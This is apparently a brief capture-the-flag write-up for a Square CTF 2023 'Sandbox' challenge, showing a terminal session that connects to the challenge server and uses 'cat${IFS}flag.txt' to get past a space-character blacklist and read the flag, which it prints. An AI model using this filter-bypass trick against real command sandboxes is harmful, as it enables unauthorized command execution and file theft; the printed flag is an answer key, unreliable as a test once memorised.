Sandbox [Square CTF 2023]
Challenge Description
I “made” “a” “python” “sandbox” """" nc 184.72.87.9 8008
Intuition
It seems the server blacklist the space character so I am not able to cat flag.txt
.
Solution
Escape the space character by using the following command:
āāāš®¤ļ HON3YP0Tš®„āš®¤ļ 192.168.0.234š®„āš®¤ļŖØ 192.168.0.17š®„
āāāš®¤ļ ~š®„
āāļ§ nc 184.72.87.9 8008 [11:51PM ]
Hi! Welcome to the kidz corner sandbox! we made it super safe in here - you can execute whatever command you want, but only one word at a time so you can't do anything too dangerous, like steal our flags!
cat${IFS}flag.txt
flag{did_you_use_ifs_or_python_let_me_know_down_in_the_comments}
Flag
flag{did_you_use_ifs_or_python_let_me_know_down_in_the_comments}